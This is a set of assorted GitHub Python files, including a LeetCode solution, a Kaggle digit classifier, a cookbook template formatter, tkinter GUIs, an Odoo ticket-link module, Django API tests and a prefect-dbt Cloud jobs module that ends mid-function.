+{"seq_id":"14408654233","text":"from typing import List, Optional\nimport math\nimport numpy as np\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if prices is None:\n return 0\n n = len(prices)\n if n == 1:\n return 0\n\n minprice = np.inf\n maxplus = 0\n for i in prices:\n if i < minprice:\n minprice = i\n continue\n\n if (i - minprice) > maxplus:\n maxplus = i - minprice\n\n return maxplus\n\nif __name__ == '__main__':\n nums = [7,1,5,3,6,4]\n nums = [7,6,4,3,1]\n res = Solution().maxProfit(prices=nums)\n print(res)","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo121.py","file_name":"demo121.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70193062410","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport evaluation as e\nimport read_dataset as rd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.ensemble import RandomForestClassifier\n\ndef evaluate_parameters():\n X,y = get_train_data(limit=25)\n\n scores = []\n scores_std = []\n\n print('Start learning...')\n forests = [70]\n rbm_components = [1100]\n rbm_learning_rate = [0.06]\n rbm_n_iter = [20]\n\n it = itertools.product(forests,rbm_components,rbm_learning_rate,rbm_n_iter)\n\n for (trees,components,learning_rate,n_iter) in it:\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n name = \"plots_pipeline/pipeline_{}.png\".format(trees)\n e.evaluate_classifier(classifier,X,y, name=name)\n\ndef submission(trees=70,components=1100,learning_rate=0.06,n_iter=20):\n X,y,test_X = get_train_and_test_data()\n\n print(\"Defining classifiers\")\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n print(\"Training classifier\")\n classifier.fit(X,y)\n predictions = classifier.predict(test_X)\n\n #Most submitions are cute with a CSV. Might as well learn how to do it.\n pd.DataFrame({\"ImageId\": range(1,len(predictions)+1), \"Label\": predictions}).to_csv('submit_rbm.csv', index=False, header=True)\n\ndef get_classifier(trees,components,learning_rate,n_iter):\n rbm = BernoulliRBM(verbose=True,n_components=components,\n n_iter=n_iter,learning_rate=learning_rate)\n random_forest = RandomForestClassifier(trees)\n return Pipeline(steps=[('rbm',rbm), ('forest',random_forest)])\n\ndef scale(X):\n return (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling\n\ndef get_train_data(limit=-1):\n print('Loading train data')\n X,y = rd.read_train(limit=limit)\n print('Augmenting data set')\n X,y = rd.nudge_dataset(X,y)\n print('Scaling data')\n X = scale(X)\n return X,y\n\ndef get_train_and_test_data(train_limit=-1,test_limit=-1):\n X,y = get_train_data(train_limit)\n print('Loading test data')\n test_X = rd.read_test(limit=test_limit)\n test_X = scale(test_X)\n return X,y,test_X\n\n#evaluate_parameters()\nsubmission()\n","repo_name":"costapt/kaggle_digit_recognizer","sub_path":"rbm_with_random_forest.py","file_name":"rbm_with_random_forest.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34384548400","text":"import string\n\nclass TemplateFormatter(string.Formatter):\n def get_field(self, field_name, args, kwargs):\n if field_name.startswith(\"$\"):\n code = field_name[1:]\n val = eval(code, {}, dict(kwargs))\n return val, field_name\n else:\n return super(TemplateFormatter, self).get_field(field_name, args, kwargs)\nmessages = ['Message 1', 'Message 2']\n\ntmpl = TemplateFormatter()\ntxt = tmpl.format(\"Hello {name}, \"\n \"You have {$len(messages)} message{$len(messages) and 's'}:\\n{$'\\\\n'.join(messages)}\",\n name='Alessandro', messages=messages)\nprint(txt)\n","repo_name":"PacktPublishing/Modern-Python-Standard-Library-Cookbook","sub_path":"Chapter02/text_04.py","file_name":"text_04.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"16"}
+{"seq_id":"20800201828","text":"import tkinter\nimport CustomerLoginWindow\nimport colorfile\nfrom databases import StockDatabase, CustomerDatabase, StaffDatabase, BasketDatabase, OrderDatabase\nfrom staffViews.stockManager import StockManager\nfrom staffViews.staffManager import StaffManager\nfrom staffViews.custManager import CustomerManager\nfrom staffViews.orderManager import OrderManager\n\nclass StaffPortal:\n def __init__(self, db:StockDatabase.StockDatabase,customerdb:CustomerDatabase.CustomerDB,staffdb:StaffDatabase.StaffDB, bdb:BasketDatabase.BasketDatabase, odb:OrderDatabase.OrderDatabase, closeFn):\n #Public vars\n self.db = db\n self.customerdb = customerdb\n self.staffdb = staffdb\n self.basketdb = bdb\n self.orderdb = odb\n self.closeFn = closeFn\n #Window Builder\n self.root = tkinter.Toplevel()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.HandleClose) #Captures the close event to close it properly\n self.root.title(\"BuildrightDB\")\n self.root.geometry(\"900x450\")\n self.DrawWidgets()\n\n self.root.mainloop()\n\n def DrawWidgets(self):\n #Header Frame\n self.headerFrame = tkinter.Frame(self.root, bg=colorfile.topbarcolor)\n self.headerFrame.place(x=0,y=0,width=900,height=64)\n self.titleLabel = tkinter.Label(self.headerFrame, text=\"Staff Portal\", font=\"default 32 normal\", anchor=\"w\", bg=colorfile.topbarcolor)\n self.titleLabel.place(x=8,y=8,width=400,height=48)\n\n #Stock Management\n self.stockViewButton = tkinter.Button(self.root, text=\"Stock Management\", command=lambda:self.ViewStock())\n self.stockViewButton.place(x=8,y=100,width=438,height=125)\n\n #Staff Management\n self.staffViewButton = tkinter.Button(self.root, text=\"Staff Management\", command=lambda:self.ViewStaff())\n self.staffViewButton.place(x=454,y=100,width=438,height=125)\n\n #Customer Management\n self.customerViewButton = tkinter.Button(self.root, text=\"Customer Management\", command=lambda:self.ViewCustomer())\n self.customerViewButton.place(x=8,y=233,width=438,height=125)\n\n #Order Management\n self.orderViewButton = tkinter.Button(self.root, text=\"Order Management\", command=lambda:self.ViewOrder())\n self.orderViewButton.place(x=454,y=233,width=438,height=125)\n\n def HandleClose(self):\n #print(\"Closing!\")\n self.root.quit()\n self.root.destroy()\n self.closeFn()\n\n def ViewStock(self):\n stockmm = StockManager.StockManager(self.db)\n\n def ViewStaff(self):\n staffm = StaffManager.StaffManager(self.staffdb)\n \n def ViewCustomer(self):\n cman = CustomerManager.CustomerManager(self.customerdb)\n\n def ViewOrder(self):\n oman = OrderManager.OrderManager(self.orderdb, self.customerdb, self.db)","repo_name":"jasonthehuman05/CompSciCoursework","sub_path":"CourseworkMainProgramming/StaffPortal.py","file_name":"StaffPortal.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43681037952","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass LinkType(models.Model):\n \"\"\"Type of a link.\n \"\"\"\n _name = 'anytracker.link.type'\n _description = \"Link type\"\n _order = 'name'\n\n name = fields.Char(\n _(\"name\"),\n size=64,\n required=True,\n translate=True)\n description = fields.Text(\n _('Description'),\n translate=True)\n\n\nclass Link(models.Model):\n \"\"\"The link is used to link 2 tickets.\n For example, it is useful to link a use case ticket with a few technical tickets.\n A ticket can be present in several links.\n \"\"\"\n _name = 'anytracker.link'\n _description = \"Link between two tickets\"\n\n @api.one\n @api.depends('ticket_two', 'ticket_one')\n @api.onchange('ticket_two', 'ticket_one')\n def _data_tickets(self):\n # This function is used for ticket view\n # to display the list of active ticket links\n # In the link, the active ticket can be ticket_one or ticket_two,\n # the goal is to display the ticket that is not the active ticket\n\n for link in self:\n if self.env.context.get('active_id'):\n active_id = self.env.context['active_id']\n if link.ticket_one:\n if link.ticket_one.id != active_id:\n link.name = link.ticket_one.name\n link.number = link.ticket_one.number\n link.stage = link.ticket_one.stage_id.name\n link.progress = link.ticket_one.progress\n\n if link.ticket_two:\n if link.ticket_two.id != active_id:\n link.name = link.ticket_two.name\n link.number = link.ticket_two.number\n link.stage = link.ticket_two.stage_id.name\n link.progress = link.ticket_two.progress\n else:\n link.name = False\n link.number = False\n link.stage = False\n link.progress = False\n\n ticket_one = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket one',\n required=True,\n ondelete='cascade')\n ticket_two = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket two',\n required=True,\n ondelete='cascade')\n\n linktype_id = fields.Many2one(\n 'anytracker.link.type',\n 'Type Link',\n required=True,\n ondelete='cascade')\n name = fields.Char(compute='_data_tickets', string=\"\")\n number = fields.Char(compute='_data_tickets', string=\"\")\n progress = fields.Float(compute='_data_tickets', string=\"\")\n stage = fields.Char(compute='_data_tickets', string=\"\")\n\n @api.multi\n def name_get(self):\n \"\"\" Set a display name to better represent the link between two tickets \"\"\"\n\n result = []\n\n for link in self:\n display_value = \"{} <-> {}\".format(\n link.ticket_one.number, link.ticket_two.number)\n result.append((link.id, display_value))\n\n return result\n\n def return_action_ticket(self):\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n 'name': 'Ticket',\n 'res_model': 'anytracker.ticket',\n 'view_type': 'tree',\n 'view_mode': 'tree',\n 'target': 'current',\n 'nodestroy': True,\n }\n\n @api.multi\n def action_delete_link(self):\n # FIXME - Is there no verification to be done before deleting a link?\n self.unlink()\n return self.return_action_ticket()\n\n @api.multi\n def action_open_link(self):\n\n # This will make sure we have one record, not multiple records.\n self.ensure_one()\n\n return {\n 'name': self.name,\n 'res_model': 'anytracker.link',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'context': {},\n 'view_mode': 'form',\n 'view_type': 'form',\n 'target': 'new',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n\nclass Ticket(models.Model):\n \"\"\" Add links\n \"\"\"\n _inherit = 'anytracker.ticket'\n\n @api.one\n def _getAllLink(self):\n LINK_MODEL = self.env['anytracker.link']\n for ticket 
in self:\n ticket.all_links = LINK_MODEL.search(\n ['|', ('ticket_two', '=', ticket.id),\n ('ticket_one', '=', ticket.id)])\n\n @api.multi\n def action_add_link(self):\n\n # This will make sure we have one record, not multiple records.\n self.ensure_one()\n\n # template = self.env.ref('account.email_template_edi_invoice', False)\n return {\n 'name': \"add new link\",\n 'res_model': 'anytracker.link',\n # 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': {'default_ticket_one': self.id},\n # 'view_id': self.env.ref('view_prod_order_form'),\n 'target': 'new', # 'target': 'current',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n link_ids = fields.One2many(\n 'anytracker.link',\n 'ticket_one',\n 'Links',\n copy=True,\n help=\"The tickets linked to this ticket\")\n all_links = fields.One2many(\n 'anytracker.link',\n string=\"links\",\n compute='_getAllLink')\n","repo_name":"anybox/anytracker","sub_path":"anytracker/link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40350522053","text":"\"\"\"\nThis is a test\n\"\"\"\n#-----------------------------------------------------------------------\nfrom tkinter import *\n#-----------------------------------------------------------------------\n\n# Window Declaration\nroot = Tk(className=\"Ben's Window\")\n\n# Button Functionality\ndef myClick():\n myClick = Label(root, text=\"!!!Poop Alert!!!\").pack()\n searchBox = Label(root, text=\"Input: \" + search.get()).pack()\n\n\n# Labels\nmyLabel = Label(root, text=\"Hello Ben!\")\nmyLabel2 = Label(root, text=\"I hope you are having a wonderful day!\")\n# Buttons\nmyButton = Button(root, text=\"Do Not Press!\", padx=100, pady=100, command=myClick, fg=\"white\", bg=\"red\")\nsearch = Entry(root, fg=\"black\", bg=\"light blue\", width=25, borderwidth=5)\n\n# Pack it in\nmyLabel.pack()\nmyLabel2.pack()\nsearch.pack()\nsearch.insert(0, \"Fuck you!\")\nmyButton.pack()\n\nroot.mainloop()","repo_name":"BenRosentha1/Beginner-Projects","sub_path":"GUI Shit/guiTest.py","file_name":"guiTest.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39232229680","text":"\"\"\"Tests for Ingredients API.\"\"\"\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient URL\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='test@example.com', password='testpass123'):\n \"\"\"Create and return new user.\"\"\"\n return get_user_model().objects.create(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Tests unauthenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Tests authenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n # Create user and login\n self.user = create_user()\n self.client.force_authenticate(self.user)\n\n def test_retrieve_ingredients(self):\n \"\"\"Tests retrieving a list of ingredients.\"\"\"\n # Create dummy data\n Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=self.user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Check response\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db for data and order by name\n ingredients = Ingredient.objects.all().order_by('-name')\n # Serialize to simulate API\n serialized = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(ingredients.count(), 2)\n self.assertEqual(res.data, serialized.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Tests list of ingredients is limited to authenticated user\"\"\"\n # Create secondary user\n new_user = create_user(email='test2@example.com',\n password='testpass231')\n # Create ingredients\n Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=new_user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Assert response is OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db\n ingredients = Ingredient.objects.filter(user=self.user)\n # serialize data\n serialized = IngredientSerializer(ingredients, many=True)\n # Assert received same as db\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serialized.data)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Prepare for API call\n payload = {\n 'name': 'Breadcrumbs'\n }\n url = detail_url(ingredient.id)\n # Send PATCH request\n res = self.client.patch(url, payload)\n\n # Assert response OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Refresh ingredient details from db\n ingredient.refresh_from_db()\n # Assert name has been changed\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n # Create ingredient\n ingredient = 
Ingredient.objects.create(user=self.user, name='Bread')\n # Build url for API call\n url = detail_url(ingredient.id)\n # Send DELETE request\n res = self.client.delete(url)\n\n # Assert response code OK\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n # Assert that no ingredient exists\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n","repo_name":"dmawardi/recipe-app-api","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42838389886","text":"\"\"\"Module containing tasks and flows for interacting with dbt Cloud jobs\"\"\"\nimport asyncio\nimport shlex\nimport time\nfrom json import JSONDecodeError\nfrom typing import Any, Awaitable, Callable, Dict, List, Optional, Union\n\nfrom httpx import HTTPStatusError\nfrom prefect import flow, get_run_logger, task\nfrom prefect.blocks.abstract import JobBlock, JobRun\nfrom prefect.context import FlowRunContext\nfrom prefect.utilities.asyncutils import sync_compatible\nfrom pydantic import VERSION as PYDANTIC_VERSION\n\nif PYDANTIC_VERSION.startswith(\"2.\"):\n from pydantic.v1 import Field\nelse:\n from pydantic import Field\n\nfrom typing_extensions import Literal\n\nfrom prefect_dbt.cloud.credentials import DbtCloudCredentials\nfrom prefect_dbt.cloud.exceptions import (\n DbtCloudGetJobFailed,\n DbtCloudGetRunArtifactFailed,\n DbtCloudGetRunFailed,\n DbtCloudJobRunCancelled,\n DbtCloudJobRunFailed,\n DbtCloudJobRunIncomplete,\n DbtCloudJobRunTimedOut,\n DbtCloudJobRunTriggerFailed,\n DbtCloudListRunArtifactsFailed,\n)\nfrom prefect_dbt.cloud.models import TriggerJobRunOptions\nfrom prefect_dbt.cloud.runs import (\n DbtCloudJobRunStatus,\n get_dbt_cloud_run_artifact,\n get_dbt_cloud_run_info,\n list_dbt_cloud_run_artifacts,\n wait_for_dbt_cloud_job_run,\n)\nfrom prefect_dbt.cloud.utils import extract_user_message\n\nEXE_COMMANDS = (\"build\", \"run\", \"test\", \"seed\", \"snapshot\")\n\n\n@task(\n name=\"Get dbt Cloud job details\",\n description=\"Retrieves details of a dbt Cloud job \"\n \"for the job with the given job_id.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def get_dbt_cloud_job_info(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n order_by: Optional[str] = None,\n) -> Dict:\n \"\"\"\n A task to retrieve information about a dbt Cloud job.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to get.\n\n Returns:\n The job data returned by the dbt Cloud administrative API.\n\n Example:\n Get details of a dbt Cloud job:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import get_dbt_cloud_job_info\n\n @flow\n def get_job_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n return get_dbt_cloud_job_info(\n dbt_cloud_credentials=credentials,\n job_id=42\n )\n\n get_job_flow()\n ```\n \"\"\" # noqa\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n\n@task(\n name=\"Trigger dbt Cloud job run\",\n description=\"Triggers a dbt Cloud job run for the job \"\n \"with the given job_id and optional overrides.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def trigger_dbt_cloud_job_run(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n options: Optional[TriggerJobRunOptions] = None,\n) -> Dict:\n \"\"\"\n A task to trigger a dbt Cloud job run.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n options: An optional TriggerJobRunOptions instance to specify overrides\n for the triggered job run.\n\n Returns:\n The run data returned from the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job run:\n ```python\n from prefect import flow\n\n from 
prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(dbt_cloud_credentials=credentials, job_id=1)\n\n\n trigger_dbt_cloud_job_run_flow()\n ```\n\n Trigger a dbt Cloud job run with overrides:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=credentials,\n job_id=1,\n options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail-fast\",\n ],\n ),\n )\n\n\n trigger_dbt_cloud_job_run()\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n logger.info(f\"Triggering run for job with ID {job_id}\")\n\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(job_id=job_id, options=options)\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n\n if \"project_id\" in run_data and \"id\" in run_data:\n logger.info(\n f\"Run successfully triggered for job with ID {job_id}. \"\n \"You can view the status of this run at \"\n f\"https://{dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{dbt_cloud_credentials.account_id}/projects/{run_data['project_id']}/\"\n f\"runs/{run_data['id']}/\"\n )\n\n return run_data\n\n\n@task(\n name=\"Get dbt Cloud job run ID\",\n description=\"Extracts the run ID from a trigger job run API response\",\n)\ndef get_run_id(obj: Dict):\n \"\"\"\n Task that extracts the run ID from a trigger job run API response,\n\n This task is mainly used to maintain dependency tracking between the\n `trigger_dbt_cloud_job_run` task and downstream tasks/flows that use the run ID.\n\n Args:\n obj: The JSON body from the trigger job run response.\n\n Example:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run, get_run_id\n\n\n @flow\n def trigger_run_and_get_id():\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n )\n\n triggered_run_data = trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = get_run_id.submit(triggered_run_data)\n return run_id\n\n trigger_run_and_get_id()\n ```\n \"\"\"\n id = obj.get(\"id\")\n if id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n return id\n\n\n@flow(\n name=\"Trigger dbt Cloud job run and wait for completion\",\n description=\"Triggers a dbt Cloud job run and waits for the\"\n \"triggered run to complete.\",\n)\nasync def trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n 
max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n retry_filtered_models_attempts: int = 3,\n) -> Dict:\n \"\"\"\n Flow that triggers a job run and waits for the triggered run to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n retry_filtered_models_attempts: Number of times to retry models selected by `retry_status_filters`.\n\n Raises:\n DbtCloudJobRunCancelled: The triggered dbt Cloud job run was cancelled.\n DbtCloudJobRunFailed: The triggered dbt Cloud job run failed.\n RuntimeError: The triggered dbt Cloud job run ended in an unexpected state.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job and wait for completion as a stand alone flow:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n )\n ```\n\n Trigger a dbt Cloud job and wait for completion as a sub-flow:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n @flow\n def my_flow():\n ...\n run_result = trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n ...\n\n my_flow()\n ```\n\n Trigger a dbt Cloud job with overrides:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1,\n trigger_job_run_options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail fast\",\n ],\n ),\n )\n )\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n triggered_run_data_future = await trigger_dbt_cloud_job_run.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = (await triggered_run_data_future.result()).get(\"id\")\n if run_id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n\n final_run_status, run_data = await wait_for_dbt_cloud_job_run(\n run_id=run_id,\n dbt_cloud_credentials=dbt_cloud_credentials,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n\n if final_run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n list_run_artifacts_future = await list_dbt_cloud_run_artifacts.submit(\n 
dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n )\n run_data[\"artifact_paths\"] = await list_run_artifacts_future.result()\n except DbtCloudListRunArtifactsFailed as ex:\n logger.warning(\n \"Unable to retrieve artifacts for job run with ID %s. Reason: %s\",\n run_id,\n ex,\n )\n logger.info(\n \"dbt Cloud job run with ID %s completed successfully!\",\n run_id,\n )\n return run_data\n elif final_run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(\n f\"Triggered job run with ID {run_id} was cancelled.\"\n )\n elif final_run_status == DbtCloudJobRunStatus.FAILED:\n while retry_filtered_models_attempts > 0:\n logger.info(\n f\"Retrying job run with ID: {run_id} \"\n f\"{retry_filtered_models_attempts} more times\"\n )\n try:\n retry_filtered_models_attempts -= 1\n run_data = await (\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n trigger_job_run_options=trigger_job_run_options,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n )\n return run_data\n except Exception:\n pass\n else:\n raise DbtCloudJobRunFailed(f\"Triggered job run with ID: {run_id} failed.\")\n else:\n raise RuntimeError(\n f\"Triggered job run with ID: {run_id} ended with unexpected\"\n f\"status {final_run_status.value}.\"\n )\n\n\nasync def _build_trigger_job_run_options(\n dbt_cloud_credentials: DbtCloudCredentials,\n trigger_job_run_options: TriggerJobRunOptions,\n run_id: str,\n run_info: Dict[str, Any],\n job_info: Dict[str, Any],\n):\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job_info.get(\"generate_docs\", False)\n generate_sources = job_info.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run_info[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (is_exe_command and is_skipped):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # 
